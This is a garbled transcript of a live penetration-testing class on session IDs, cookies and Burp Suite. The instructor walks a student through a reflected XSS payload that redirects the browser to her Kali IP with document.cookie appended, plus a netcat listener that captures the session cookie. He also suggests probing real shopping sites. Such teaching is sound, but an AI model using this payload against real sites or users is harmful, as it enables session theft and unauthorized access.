Hey, hi, Sandhya. Good morning. Hello, Sandhya, can you hear me?
Yeah, morning.
Yeah. So we discussed yesterday about the cross-site scripting, right? I mean, we injected JavaScript into input field, so that is called as cross-site scripting. So to let me record this first. Okay, it's already been recorded. Okay. Uh, Share my screen. So did you practice on different applications, Sandhya?
Not yet.
Yeah. So the thing is like if you practice, you'll understand more test cases. Today I will give you a lot of test cases. Please note them down, and then you just have to go through that. You just have to go through that test cases, and then in different applications. Not every application will be vulnerable to every vulnerability, right? Sorry, not every application is vulnerable to each and every vulnerability. Okay, so here one application might be vulnerable to session ID expiry or OTP flooding, so and so user enumeration. So there are a lot of things so we will discuss today, and also we will take cross-site scripting to next level. Okay, we will take cross-site scripting to next level to steal session IDs, and how we can use that session IDs to uh, do authentication bypass as well. Okay, yeah. Let me open the browser. Firefox. So before going into our practicals, I would like to explain you one small concept called session ID. So what is your understanding on session ID? Surya? What is a session and what is an ID for that?
Session
Whatever
is
you know. Yeah.
uh, planned event.
Yeah. It's an something is happening like now we are in a
Yeah,
team session, right?
yeah,
So it's a teams class. It's an event that's happening, and when you log in, we call it as session as well. Okay, so when you log in, we call it a session. When you log out, we call it a session is ended,
yeah.
right? So which is very similar to that. Let me grab my pen. Yeah. Ah, okay, so session I. So actually, what happens means, let's say this is a client, this is a client, and this is a server. Okay, so normally, what how authentication will be happening is, so you will enter your username and password here, and this request will go when you when you want to validate yourself, when you want to authenticate yourself, a request will go here. Okay, and then it will ask the server to validate. Server will ask the database to validate this. So if you remember, we did SQL injection and we bypass the authentication, right? So we are actually making the changes here. We are manipulating the queries which server will ask to server will ask to the database, right? So the database will store our details. So server will ask our details to validate, and this will validate. And okay, if it say yes, okay, true. Okay, okay, Sandhya is username and Sandhya at 123 is password, and then okay, then this server will validate and give the response. Okay, so every time if you want to validate, it is very difficult actually. Every time it has to be validated. Let's say you are in this page after login. Let me do this test, and I have logged in, right? One second, it's still loading. Probably it is. What might be the reason here? It is saying the proxy
You
server
did
is
not
refusing the
open
connection.
the Metasploitable server. You did not start.
Test PHP
Which server?
vulnerweb.com is not on Metasploitable again.
Okay.
Yeah. So test PHP vulnerweb.com is someone else's server. So these small understandings also very important. Yeah, please troubleshoot this. Why? What could be the problem? So are we hosting this web application or someone else is hosting this web application? So first thing first.
Uh, We are not hosting this, I
Yeah,
think.
we are not hosting this. Only that B web and few applications are there, right? So
Yeah.
we are hosting those web applications in our Metasploitable server. We are not hosting this. We are not owner of this server. Well, we are just practicing this. So someone hosted this for us. So why it is not giving? Can you tell me? The proxy server is refusing connections. So who is our proxy server here?
Kali Linux.
Oh, who is our proxy server?
Windows. Windows.
Windows, yeah, in Windows, who is exactly is our proxy server? You're right. We install that in Windows itself.
Mm.
Who is stopping? So what is
Web
proxy
server.
again? No.
Proxy is
But
like a mediator.
yeah, who is
Transfers
mediator
the
here?
data.
Our
Server.
Burp Suite is mediator.
Okay.
Okay, Burp Suite is mediator. Who install that mediator? I mean, our system, our local host itself install Burp Suite. I mean, we ourselves are a mediator. Okay, so this assume this browser is in client. This browser is in client, and this is a mediator. And this for some reason proxy is refusing our connections. So most probably this could be the error with my proxy. I will just disable this. Okay, I'll just disable this and I will refresh this. Listen, it should probably work. Got it?
Yeah.
So what's happening here means, so you have to understand. Okay, you will get that hints from the error message. You have to narrow down your problem. So okay, right away I got that error. Okay, it is saying something with proxy. Who is my proxy here? Okay,
Burp
I
suite.
Burp Suite. So there could be two issues. Either issue in the Burp Suite itself, otherwise my proxy configuration itself. So first I would go here because this is the user point of view, right? So this is the proxy I have configured from the client. So this is proxy server. Okay, so this is a proxy application, right? Uh, Here I'm just starting the Burp Suite. So even the burp suite is off. It didn't even start my project. Okay, it didn't even start anything. Then why that error did come? Any guess? Here I'm not
You
intercepting my traffic.
disabled burp suite.
Yeah, no, I'm not intercepting my traffic here. Yeah. So you mean disable means intercepting and intercepting on and off, right?
Um, when you are in this page like
Huh.
test.php, at
Yeah.
right side top, you have disabled, right?
Huh. So here actually it was enabled and it was going to burp suite.
Okay.
So the thing is like for in this browser, I'm telling, okay, go to Bubsit. Okay, so
Yeah.
Bubsit will take you wherever he need. Okay, so wherever Bubsit wants, that Bubsit will take you to the destination. So that is what I'm telling to Bubsit. So this understanding is very important. So he is a mediator. So I'm telling browser, go to mediator. When I disable it, okay, don't go to mediator, go directly to the internet. Go to your router, go to your internet directly. Okay. So if I say Bubsit, go to Bubsit. From Bubsit, you go to internet. Understand?
Okay. Yeah.
Yeah. So here, why means I'm telling go to Bubsit, but my Bubsit itself is on. So this is second question, whether whether I am intercepting or not. So if I intercept here, if I click anything, it will keep on loading, but it will not give error. Got it?
Yeah.
But right away earlier it got sorry, it have given an error. Okay, so because the our BuzzFeed itself is off, I'm telling go to BuzzFeed close its gates. It is allowing or not, it's a secondary thing. The main gate itself is closed, right? So it given an error. Okay, main gate is closed. BuzzFeed, there is some proxy is refusing your connection. That's it. Got it?
Okay.
Yeah.
And
So
I'm
yeah.
in the page of like this testphp.vulnerweb.com.
Hmm.
In my system, I have opened. So
Yeah.
you're having like right side four at the top, right? In the
Yeah.
task bar.
Hmm.
Um, so I'm not sure why they are not in my system.
Which one? This one, Bubsit.
Ah, yeah.
Oh, I told you to install this extension probably uh, when I install the Chrome. So are you using the inbuilt browser or this integrated browser or this one Firefox?
I'm using normal like Windows Google.
No, no, please don't use Windows. It is
Okay.
little bit tricky on Windows. Okay, so it is easy when you use this one, uh, Firefox, or you just go ahead using the integrated browser itself. Okay, here you can
Okay.
open your browser
Okay.
from here. Okay, so that is auto configured, already configured. So this is for
Okay.
some reason it was not working on my machine, and I installed this Firefox right on the class itself. You got that?
Yeah.
Yeah. This
So and
configuration
also
is
in
inbuilt.
this birth
Hmm.
suit, it opens the browser only when the intercept is on.
No, it does. It is not required like that. So let
Well,
me show you. I will open the browser.
okay.
I can turn intercept on directly. So here I don't have to configure my proxy using any extension.
Okay.
Okay, so this is auto configured because this is built in, right? This is built in.
Yeah.
So here, see, I will try to access something test PHP. Let's say test PHP dot web dot com. Okay. So
Yeah.
for some reason, yeah, it is okay. Now it is working fine. It is giving this page, right? So if I want to intercept, I can intercept directly from here.
Okay.
Okay. So yeah, once I create any request, so I'm clicking on browse artist, it is going to my proxy. From here, I can send it to repeater, intruder, wherever I want. So if I
Okay.
want to repeat my requests continuously, I will repeat it. And if I want to do any attack, I will send it to intruder. There we have four types, right? Pitchfork, sniper, battering ram, and what is the other one?
Uh,
Battering ram, pitchfork, cluster bomb, and sniper. Okay, so we have the types of attacks right here. You can
mhm.
see so sniper, battering ram,
Okay.
pitchfork, and cluster bomb. So how we are attacking, we are giving different types of payloads here for different types of use cases. So that use cases also we have discussed. Please go through that. So today also we will discuss a few use cases here. Using we will get into intruder as well. Okay,
Okay.
so I would like, yeah, I was here. I wanted to explain you session ID and I came somewhere. Okay, so this is my one of my bad habit. I will go off topics and then I will be explaining very basics. Yeah, okay, that's good for a reason. Yeah. So once this database is validated, okay, we it will give us the authorized pages, right?
Yeah.
Authorized pages. Okay. So here you will get this only after login, correct?
Yeah.
So to see the session ID, we have one more extension called Cookie Editor. You can install that. So install Firefox and then configure this uh, Fi Foxy proxy, Sandhya. So this will
Okay.
be good actually. It will be good for installing all the cookie editors and all. Yeah, I love Firefox. I never use. I mean, I don't frequently use that browser. If there is any small request, right, I will use that one. Otherwise, I will be using this one, Firefox. The editor. Content did not connect. Potential security issue. Okay. Why? Probably my browser is intercepting my traffic. So that's what. So whenever you are stuck with this type of errors, right?
Yeah.
So most probably this might be causing the issue. Okay. So if you really want to capture that, this should be turned on, and here intercept should be turned on in our browser. Sorry, in
Browser.
our uh,
Worksuit.
pub sheet. Exactly. Right. So if I refresh now, it should work for sure. No, what's wrong with this? It is still with Bobs. I'm sorry. It should work. So most probably your issue is with these two only. Okay.
Okay.
So at the beginning to get adapted to that, you will confuse a bit. Even I confused when I was learning Bubseed. Sometimes. So, but understand the flow from this browser. I'm telling to go to either Bubsuite, or I'm telling if I disable it, it will directly go to internet. Okay. So here Bubsuite should be on first. Okay. And you have to decide whether you have to intercept it or not. Okay. I'm telling now intercept is off. Right. I switched off my intercept in proxy, and then I will go here. Everything will work fine here now. Okay. Just like normal browser. I'm not forwarding my request anywhere. I'm not intercepting anything. Right.
Yeah.
Got it? Yeah. So please keep this in mind. So here cookie editor Firefox extension. Search for that. Anything, first one or second one. Yeah. Add to Firefox. So it will be hiding here in. Yeah. I will pin to toolbar. So that will be handy. Otherwise, you can go to the extensions and then you can pin it. Otherwise, you can view that. Okay. So I will just close this. I don't want this. So here in the cookie editor, we will get a session ID. Okay. Okay. So we will get a session ID. So here show advanced, and then I will explain this HTTP only and secure flag. These are very important. Okay. These are very important. It is giving test at a test. So here they are giving the direct password itself. Let me open a different website. What do we have? Alter Mutual. Yeah. We can open here. I just want you to understand what is session ID and how it works. So how it works is very important. They will twist a lot of questions in interview on session ID itself. There are a lot of session ID vulnerabilities. Okay. Again, if you want to see here, so that itself is a vulnerability. See here, this is some random value, right? So there they are injecting the password itself as a session ID. So this is highly vulnerable here. Okay. So test itself they are putting. So this is a password, the login in the password they are putting this, so don't worry about that. So this is the best site to see the uh, session ID, or else you can see the session ID in any session for that matter. Okay, so here, one second, let's open any other website, amazon.com. Let's see how it shows. So here it has a lot of things. You see here how random it is, right? So it is very big string, a very big string. The value, the session token is very big string. So they are putting a very big session ID. Okay. So here, I just want to explain you one more thing. Once you validate, it is very difficult to validate for every request, right? Okay, for first request you are logging in. Okay, for the first request you are logging in. So after the second, if you want to validate for the second request as well, if you want to give the username and password for the third request as well, if you want to give the username and password, it is very difficult, right? Is on there. So are you giving your username and password for every request that you click?
Maybe I will save and like auto
No, no. I
logins.
mean every request in the sense once you log into Amazon.com. So for
Mhm.
clicking this also one request, right? So I'm requesting to give me the refrigerators page. So this page I am clicking. So even if I logged in, so do I need to log in every time
No,
I click on something?
no.
Exactly. So, but still, how it is giving. So this might not be a very good example, but what could be a very good a banking application. Okay. So if you are going for your account and fund transfer or loans tab, right? So if you are going like that, so for every request you are not logging in. So once you logged in, so what the server will do is, okay, you logged in once. I don't want you to repeat the login process every time you log in. So while validating, once this DB validates, this will generate a session ID. Okay, this will generate a session ID. So along with the response, this session ID will be included and will be sent to this one, and will be sent to the source. That I mean the client. Okay, this will be sent to the client. Once it is received here, once it is received here, this is stored in. Okay, this is stored in the cookie. Okay, cookie. Okay, so a cookie is a very secure storage. You can store this in your normal memory as well. But why we are choosing cookie? Any raw guess here? Why we store in cookie? So
If we
even
lose our
in your
memory also, it will be in the cookie.
okay, yeah, a very good guess. Any other guesses? I will give you one
Cookie is
example. Like you don't store your ornaments in any storage. Let's say in a box which is accessible for all the public, but you will keep it in a safe place, right? Maybe in a locker, very safe locker for the matter, even in your bureau or something like that. Inside that there will be again a safe. So inside that also there will be again a safe. You will keep like that, right? So similarly, your memory is accessible for everyone. So here you have to store it securely. Okay, here you have to store it securely. Cookie is one place like that, and it is of 4 KB. Okay, it is a 4 KB. So the one more thing is we can't store anything more than 4 KB. So few types of attacks, few types of injections will not be possible to steal this cookie. So cookie stealing is become difficult here. I mean, it is not highly impossible, but it will become difficult. Okay, so it will become difficult. Here we will store it. So whenever for the further requests, okay, for the further request, one second. Mm. Okay, for the further request, what I will do is I will append this cookie and I will send it to the server. The server don't need, okay, it will see, okay, session, I got the session ID along with the request. I will see whether this is present in my system or not. Okay, whether this is present in my system or not. I will validate. If yes, I will send back the request, send back the response. Okay, I will send back the response. Again, when I give another response, I will, okay, this validate the session ID again. Instead of the password every time, instead of the username and password every time, I will just validate the session ID. Okay, I will just validate the session ID. So this is a concept of session IDs. Okay, do you get this concept, Sam?
Yeah.
So here there is one more catch. So how you will validate whether this user is valid or not? Okay, this DB validated already. Okay, this DB validated already and said yes. So what if I log out? What if I log out? What if I log out, and how should me my behavior? Raw guess. Me guess. How should be my session ID there? Now I have a session ID. I can copy and keep it with me. It is in my cookie only. I can copy and keep it with me. And even once I log out, once I log out, should give
It
me.
will recommend some like
Yeah,
which are saved in the cookie
yeah. What
to
I'm telling is, okay, I will still, let's say, ABCD is my cookie. ABCD my is cookie. I am storing it in my cookie. Once I log out, I still have this cookie with me. Okay, so I will give this cookie along with my request. I will give this cookie along with my request plus my cookie ABCD. Okay, and then this will validate ABCD, right? And then ABCD is there in this system. So how this whole system should work with your logic? So if you are a developer, how you will develop? Just raw guesses.
Maybe it should not like be in the memory. It should not be stored in the memory
100%. You are very close to that. Yeah, it should
because
clear the
like a authorized
in
person
the memory in the sense on the client side or in the server side.
client side.
Okay.
Sorry,
So
server side.
okay. Yeah. Why on server side and why not on client side? Answer is correct. So can you tell me the logic behind what could go wrong if I keep that in the client side and not on server side?
Client side is like not only we, all other users
Hmm.
will be like trying to log into that page, and all the
Exactly.
users' session ID and passwords will be stored in the
Yeah.
cookies. But in the server side, only we will be login as a authorized person, so our credentials will be like saved.
Right. Yeah. You're almost right. So here there is a concept called the state of the authorization. Okay, so there is nothing a concept like that, but the word state of authorization. Okay, so what are the states that you observe? After login, before login, after login. I mean, this login is after login only. After logout. So if you give three session IDs for each and everything, okay, three different IDs, okay, three different IDs. Can I define my state?
Yes,
So for every user after before authentication, I will give some random session ID. Okay. So I will just compare that session ID and I will find my state. Okay, before login. So this guy is not validated, right? So that is very important here. Again, after login. So once you log in, I will give you one session ID. I will maintain that for some time. I will maintain that for some time. And once you log out, I will give you another session ID. Okay, I will give you another session ID. It is similar to before login. So now you understand how you can do this. You can differentiate the state of the authorization. It's
yeah,
very easy, right? If I give some number, okay, if you are logged in, okay, take this number. You are log out, take this number. Before login, take this number, so that I will know which state you are, and then validate and authorize you accordingly. So, right? So here there is one more catch. There is one more catch. Just first I will explain another thing. Once you logged in, if you open new page, new tab, do you have to log in again? For example, I will open my Gmail. Where is Chrome? So here I will open my Gmail. Okay. If I'm searching for Gmail here uh, and I'm logging into that, do I need to log in here? Question.
yes.
Do I need to log in here? No.
Not
So,
here. After
ah,
this,
no, even after this, I don't have to log in here. So this is because every
it's
request going
already
from this
saved.
browser, right? No, no, it is not already saved. The password is saved. Sorry,
Oh,
the password can be saved or cannot be saved. Okay, it is not saved. Let's assume password itself is not saved. But still, if I open a new page or if for the matter even a new tab, Control Shift N. Oh, this is Control N. Okay, I opened a new tab. So I'm opening Gmail. It is directly opening me. It is authorizing me and it is showing me mails, right? Right.
yes.
So what do you think the logic behind this? Just now we discussed about that.
It's saved in the cookie.
Yeah. What is saved in the cookie?
Session ID and password, like
Exactly.
username and password.
Exact. Username and password should not be stored in a cookie, because if the cookie is stolen, username and password will be stolen. So if you steal the session ID, that session only will be available for you. If you steal the password, username and password, whenever you want, you can log in. So passwords are not stored in session IDs or cookies. Okay. So here, for the browser will take with respect to this domain mail.google.com, and it will append the session ID which is created for this one, right? So if you open a bank application, so it will log you out within maybe 5 minutes of inactivity, right? So there we have to think about your business logic. Okay, there you have to think about your business logic. Whether do I have to log them out as soon as possible, or do I have to keep them forever? So in Chrome, in Gmail, Facebook, Instagram, you know, shopping applications like Amazon, Flipkart, and all. So they will not log you out itself. So why they don't do log out? Even if after days, they will not log you out automatically. Why? But banking applications will log out very soon. I have to log in for every 5 or 10 minutes of inactivity. What do you think?
As banking is like a security thing,
Yeah.
they're
And
like
here in Gmail as well,
uh,
it is very important. All my documents, any pay slips or whatever it is, will be in my mail ID, and many accounts are linked to my mail ID. So even that has to kept secure, right? So, and a lot of private
yeah,
information is there in Gmail. So why they are not logging out? So can we tell this as vulnerability?
to
I
some
mean,
reason.
there is actually, yeah, you're right. I am expecting answer similar to that. Yeah, there is a thin line between business logic and security. Sometimes even customers will come to you and will say, "Okay, this is a vulnerability. I know that, but this is a business logic. Okay, so it has to be like that. So we can't fight on that point. Then they have to accept the risk. Okay, if you are keeping this one forever, so if a session ID is stolen, or some session fixation or any session related vulnerabilities are happening, then we can't stop it immediately. Okay, so we can't stop it. That session, if you are maintaining the persistence, so he can get it forever, right? Attacker can get the access for, he will be authorized forever. So we should not do that. Should not do that. My battery is draining out. Just give me a second. Yeah. So yeah. Talking about the business logic. So it depends on how they have to configure. So also in shop, like these applications of social media. So they want you to get addicted to that, and then they will never log you out, right? So they will never log you out. So that depends on the business logic. There's a thin line. Going back, yeah, this is all about session ID. So before login, after login, after logout. So please remember this. Okay, so these three should be different. Okay, so a few more things. Yeah, so please share your screen and open, just like any browser, like yesterday, we did yesterday, right? So to do the attacking, I will ask you to explore. Yeah. Who is this army angel unverified? Who is this army angel? Guys, guy, can you unmute yourself and then Answer. Who is Army Angel? The other, the other one apart from Sandhya.
In the chat, they have
Yeah,
given
join the
lost.
call. Sorry.
In the chat, they just like 10 minutes ago they given a message like no sound.
Okay. Yeah, Mr. or Mrs. Army Angel. Yeah, let them listen.
Do you want me
Okay.
to share my screen?
Yeah, please. We'll do some attack. So yesterday we did cross-site scripting, right? So
Yeah.
open this Altoro Mutual site. We will steal the cookie. So just like that, prepare your payload. Prepare your payload, and then we will steal the cookie. Yeah. Mm. Here, rather than that, you can open this browser, Altoro Mutual. So that's a live application. We can see the Altoro Mutual browser. Yeah, in the browser itself, open Altoro Mutual.
Is this correct?
Altoro Mutual. RO. Yeah, you can just give let it search. Just search. Yeah.
It's not giving anything.
Okay. Just search on upside on the URL bar. Please go to that. Testify.net. Altoro. Yeah, that's fine. Uh, install cookie editor. I mean, cookie editor extension. You can close this right side, Sandhya. I mean, you know, that grade. Yeah, I can see the full screen now. Yeah, please. Good. So install the cookie editor. Yeah. So also you can have one more Firefox in your host machine or Firefox. Yeah. Yeah.
First one
Maybe.
is fine.
Yeah. Yeah. Okay. Yeah, it is fine. Just select Firefox when you select that. Yeah. Install now. Firefox. Yeah. Add to Firefox. Add. Okay. So uh, just open that extension icon. Probably it would have installed already. On the right side, beside that hamburger. Yeah. Cookie editor, and then add it to right click. Maybe a setting, or you can open that gear icon. Pin to toolbar. Yeah. So now go to Alternative. Yeah. Open cookie editor now.
Do I need to search here or?
No, no. Here you have that cookie editor, new icon, right? Yeah, cookie editor. Permissions needed. Yeah, click on that. All sites. Yeah. Hello. Yeah. See, expand the J session ID. So you can see this. Just remember the last three letters. So this is you. Did you log in to this application?
No.
So give test and test as username or admin as username and log in to this. Yeah, let's try. I think it's admin if I'm not wrong. Yeah, just try with both. Just try with both.
Admin and password. Yesterday we do.
Okay. Yeah. So that
No.
is for different. Just give admin. Yesterday we tried DVWA for that, if I'm not wrong. That admin and password. Admin. Yep. Yeah. So you are already logged in. So now open cookie editor and check whether you got a different session ID or not.
Yeah.
So just scroll down a little bit. Okay, so you got a different password hold together. Okay, so here just close this cookie editor. I will explain you one more thing. Now, if there is any JavaScript vulnerability, I mean the cross-site scripting here. So yesterday we saw JavaScript, I mean XSS in search bar, right?
Yeah.
So give a payload like this script document.cookie instead of we said print something, right? So not like that. So how the payload should look? Open the text editor. Just we will change there itself. Yesterday you copied and pasted somewhere, right? I mean the text editor where you are writing all the payloads. Huh. So how is it? What is the syntax of writing a JavaScript? So it should be in
Double quotes or single quotes?
no. I mean the script inside the script tag. Okay, so first open and close script tag. Right,
Yeah.
open and yeah, yeah. So in between that, alert document.cookie. So without any quotes and all, alert within brackets document.cookie. Alert should be after document.cookie should be in uh, brackets.
Document.cookie in brackets only, right?
Uh, Wait, actually your screen is refreshing after after long time. Yeah.
Oh,
So
okay.
okay. So remove that space between alert and the bracket. Yeah, please. Now copy this code. Copy this code and paste it there in search bar. So did you get the whole session ID or not?
Yeah, I have got.
So it got printed there, right?
Yeah.
Okay. So I will explain you how to steal this. Okay, this is reflected. It's just getting printed on your application, and also you can steal this application whenever there is a reflected vulnerability. So not much you can do unless and until you can see that and it get executed only once. So we have to trick the user. So tricking user is called as social engineering. So what is social engineering, Sandhya? You might have heard this word a lot of times in IT industry. What is social engineering or
Social
phishing?
engineering.
Did you hear about phishing?
Yeah, I heard about phishing.
What is phishing
Like
and email?
phishing in terms of like hacking emails.
Yeah. What exactly is phishing? I mean, tell me your understanding, not
Some
about.
of the unauthorized users, they
Yeah.
send us the phishing emails like to sign. If you click on this link, your account will be like credited with such amount.
Yeah.
Some of the like it's a junk mail actually,
Mm-hmm.
but they will do send us a like phishing emails.
Yeah. Got it. So, what we can do is how that phishing emails. Okay, one second. Army Angel. Okay. Yeah. So here, where was I? Ah. So when it is scripting, as a hacker, you need this session ID, right? You
Yeah.
need this session ID. So this is also very random session ID. We have to change few settings. I will let you know. But you have to copy this. How you can copy this without, user interact? I mean, your interaction here. We have to do phishing whenever there is reflected vulnerability, right? We can do phishing activity. Okay. So when how you can do that is you can write instead of the document dot cookie, just instead of printing, we have to send this cookie to our location. So let's do that as well. Okay,
Okay.
write this code like this. Inside the script, uh, open the text editor in your host machine. Inside script tag, open
Yeah.
a new line. Yeah, new line. uh, Write window dot location equal to window dot location equal to in double quotes or single quotes
Mhm.
http colon double slash.
Yeah.
You have to write your Kali Linux IP. So get your Kali
Okay.
Linux. It should be 10.0.2 dot sorry 4.15 if I'm not wrong, or 4.5, whatever. You can just check it. So what is IP? Yeah, 2.15.
Yeah.
You already have that. Yeah, 2.15. And then you already wrote that. And colon any random port number. Let's give 8080.
Mm-hmm.
No. That is slash colon double dot. Yeah. So it is refreshing very late for some reason. I don't know why. Yeah, slash
Yeah.
search.jsp.
Mm-hmm.
Search.jsp question mark.
Is it JSP?
Yeah, just
Okay. Yeah.
question mark. Close it. I mean, double quote, closing quotes plus document dot cookie.
Okay.
Yeah.
Yeah.
So plus document dot cookie. Now your payload is ready. Okay. So this is how we write the payloads. So actually,
Mm-hmm.
you don't have to do all this. The ready-made payloads will be available. You have to download that. But what you are telling, so just by looking at the payload, what you can understand. So you tell me. This understanding
So,
is very important, Sanjay. Yeah.
um, from this window location,
Mhm.
from our windows,
Okay.
we are giving the URL as Kali Linux IP in our windows,
Okay.
and it's searching for the Kali
No, no.
Linux
First
IP.
of all, window is not Windows again. It's just
Okay.
script functionality in JavaScript.
Mm-hmm.
Okay, so it is telling that, okay, go to that window. So open that window, something like
Which
that. Okay,
one?
so the window dot location, right?
Yeah.
Yeah. So you can just understand that. You can whatever you please continue your explanation.
Uh, Maybe we are directing our windows to the location URL which we have given.
So actually, what we are doing here is we are telling, open this browser. Okay, open. Go to this location on this port number
Mm-hmm.
with along with okay along with document.cookie. So document.cookie gives our
It
cookie.
creates the document for the
No,
cookies.
actually our cookie will be coming. Okay, so just like we just printed our cookie, right?
Yeah.
Using what alert document.cookie. So
Mm-hmm.
here we are appending to the request. Okay, here we are appending to the request and asking our code. Okay, whoever clicks this link, go to that site. Okay, go to that
Okay.
site. So that site we have to create on our machine right now. Okay, our machine right now. Open Kali Linux. I will explain you with a diagram after this attack, and then we can understand easily. Open Kali.
Yeah.
Your screen is very lagging. Can you stop your screen share and then share it again? I mean,
My
after.
network is speed only. Okay, I
Okay,
have to share.
probably issue is mine. 1 second. It's not even in battery saving mode. Okay, second high performance. Okay, no worries. So here you have to listen on that port. So to listen on that port, a service need to be open, right? When I say, you have to listen on that port, a port should be open, a service should be running on that. So how you can open a port on a, this is a question for you. We discussed this long back ago while discussing infrastructure penetration testing. So our network penetration testing. So now we are in web, but we will use a tool here. So what is the tool that we use to listen on ports?
Nmap.
No, no. Nmap is for
N-
scanning on ports.
Okay.
What is the other?
Um, okay. I'm just going through my notes. Port scan.
Yeah, please go through your notes. No, port scanning is scanning for the ports. We are not opening the ports anyway. Whether we are checking whether the ports
Universal
are open or
mention.
not. Reverse shell by shell. Exactly. What is the tool that we use there?
Okay. Netcat.
Exactly. So what is a open a port on Netcat, random port on we just written our code as 8080. So we will go with 8080 only.
Okay. NC
Hmm,
IP address and port number.
exactly. NC IP address and port number, that is for connecting to that.
Okay.
So how to open a port, how to listen
Mm,
a port. So I explained you LVP, listen verbose port. So if your command have L,
NC hyphen
so that
LVP.
means we are listening. Exactly. So open a port on that. So this is very important. So you should understand what
NC
we are doing.
LVP
Yep. Uh,
8080.
8080, right. So what does this mean now, Sandhya? NC hyphen LVP port 8080 means?
We are we are opening the sorry, we are listening on the port 8080.
Exactly. We are running a service to listen. Okay. So whatever
Okay.
you give on port 8080, I will listen to you. Okay. So now,
Okay.
okay. So now the listener is also there. Okay. And our payload is also there. So go paste that payload there in your Altoro Mutual. Let's see whether it will reach to your machine or not. Press enter here. You're not running that. You're not listening. You just type the command.
Oh, okay. In this one.
Yeah.
Yeah.
Okay. So now you are listening on port number 8080. Okay.
8080.
So now give the whole payload on this set string, such input. So this will be fun today for you. Yeah.
Mm.
So copy that, give it on that search field.
Can I click OK here?
Uh, I mean, yeah, you
Um,
click OK. Yeah. It's a little bit laggy. I'm getting after
oh,
10-15 seconds. Yeah. So type there, just click go.
yeah, I did that.
Okay. Now go to your command prompt.
We go
Command
unable
prompt.
to
Yeah.
connect. Okay.
Did you receive anything here? Do you see
Yeah,
anything
inverse
weird here?
post lookup failed.
No. Do you see anything on this command prompt?
I think the session ID.
Exactly. The same thing you got here, right?
Yeah.
So this is how you steal. Actually, we are doing it locally. So we have a
Okay.
private IP. So this 10.2.15 is private IP. So if you are really hacking, right? So uh, this guy attacker will create a server which will listen publicly in internet. Okay, so
Okay.
in internet he will be listening that. So if he is listening that, if anywhere in the world if that link is being clicked, okay, if that link is being clicked, so he will get the session ID. So with the session ID, what attacks we can do, I will explain in next session. Okay, once
Okay.
you get the session ID, so how you can leverage that session ID and how you can do that, and also we will see the remediations and steps as well. So at the same thing, I want you to understand. Please log out Altoro Mutual now. Please log out Altoro Mutual now.
Shall I close it or
Just log it out. Log out. Not, don't close that. Just log out. Come back. Yeah, come back.
sign off? Okay. Yeah, I'm in the home page now.
So this 10 seconds delay is yeah. Okay, no worries. Uh the voice is advanced and then the screen is very black.
Oh,
It probably my side issue is from my side. So my laptop behaves very weirdly if the battery is very low. Maybe it will go to
okay.
battery
Yeah,
saving mode.
now I'm in the like home page of Altora Mutual.
Yeah. So now use the same attack. Go on the search button and then see what session ID you are getting. Paste the same payload. And first thing you have to remember, you are not listening now. So please go ahead, listen there, and then paste the payload. Yeah,
Okay, so once again, I need to give NC hyphen LVP
exactly. You can use your
88.
up arrow. Uh, Keep a habit of
Okay,
using up arrow.
okay.
So you can give any port for that matter, but the both the port numbers should match.
So 8080 we are giving because like in Mozilla Firefox we are on 8080 port.
It is not like that. You can give whatever the number you want in between 0 to 6 5 5 3 5 apart from
Oh, okay.
registered ports. So you can give 1 2 3 4 or 4 4 4 4. You can change that, but you have to change your payload as well. So if you are listening on 4444,
Ah, yeah, yeah,
my two address also should be the same port number, right?
yeah.
So you can change your port number and see. You can clear your
Then I
doubt.
gave like
1 2 3 4.
okay.
Your wish. Your wish. Choose your number.
C hyphen. This page does not have any cookies.
This page does not have any cookies.
Cookies.
One second. Yeah. Once. Not able to see that yet. Let the 10 seconds complete. Still
Oh,
still not loaded.
is this?
Still not loaded. Still not. I can't see your terminal somewhere.
I'll share once again.
Yeah. After logout also you should get a session ID, but it should be different from after login. Port number 1 2 3 4. Yeah, you are listening. No, it is fast. Or else maybe I'm seeing 10 seconds before video.
Yeah, now I got it.
So now you got it, right?
Yeah.
So the session ID you got. So actually, this is not exact session ID. I will explain you. There is one more concept. The secure
Mhm.
flag and HTTP only flag. Once we complete that, you will get. We will steal some session IDs like this. So you are getting it from here. So even if you are doing it in your machine, right? I mean, Windows machine, and if you
Windows.
are using, yeah, but we can steal it from here. But you have to make sure that there is connectivity between your Windows and Kali
Kali.
Linux. Okay, so if there is no connectivity, it can't reach, right? If there is no
Yeah.
pathway, it can't reach. Yeah. So first we have to ensure that we will try that as well. Okay, if we have time. So now you understand, right, how to steal
Yeah.
cookies. Uh, I wanted to explain a few more things real quick. I will share my screen. You can
Sure.
stop sharing. You try today. You try today in your And there are these many payloads are there. I will show you this payload list. So you can, you can try what this is doing. Okay.
Okay.
So how these are few bypassing techniques are there as well. I wanted to explain few more things. Now we discussed. Now we discussed the session ID should be before login, after login, after logout. It should be different. All three should be different, right? So
Yeah.
then only we are telling that the application is secure. Okay, all three should be different. So and then session ID should expire after some time. Session ID should expire. Please note this down. Expire after some time. So this sometime is defined by the application owner. Okay, we are not defining this time. So if it is not expiring forever, we have to check with the customers. Like, okay, it is not even, expiring after 1 hour or 2 hours. So do you want? Is this your business logic, or do you want us to, do you want uh, this to be logged out as soon as possible? Okay, so that we have to check with the customers, the business logic, and then uh, this is session ID expiry and session timeout. I mean, yeah, both are same. Once this expire, session should timeout, a logout should happen. Okay, logout should happen. And then the value, the session token should be a random value. Okay. So now did you see, is it a random value or is it a same value?
Random.
Session ID is a random value. And also when I say random, when you are generating if you are generating very big string like 1 2 3 ABC, okay, so after this 1 2 3 ABCD, what if 1 2 3 ABCE is generated?
It's not a
After,
random.
it's not a random, right? Even if it is a
Yeah.
long string random string. So this randomness also we have to check. I will show you how we can check using Bub Suite for this
Okay.
randomness, whether this is random or not. But by looking itself, you can check, right? I will tell
Yeah.
you how to automate this by do it on few applications. I will give you some applications to check. I have already given like Altoro Mutual, you can check. Uh, or else I will suggest you one thing. Please don't do this extensively with the Bob Suite. Do it manually. How
Mhm.
you can do it manually? Like go to any small shopping websites, like maybe Meesho.
Mintra.
Mintra, you can go Mintra. Yeah, you can try it. Mintra. Actually, now they are like, becoming secure day by day. Mintra is becoming,
Okay.
a big company. So you can try it on Mintra as well. Okay. Don't try with tools. Don't try with tools. Do it manually. Okay. So, and when it comes to broken authentication, uh, account logout policy. So, what is account logout policy?
Mm. Is it log out or log out?
Lockout. LOCKOUT.
If you are logging in by using like if you're trying to
You're right.
use number of usernames and passwords to get into the website,
Yeah.
account will get log out, lock.
Exactly. You're right here. Okay, account should get logged out, right? So,
Yeah.
who we have to define that after how many attempts it is getting, it
Yeah.
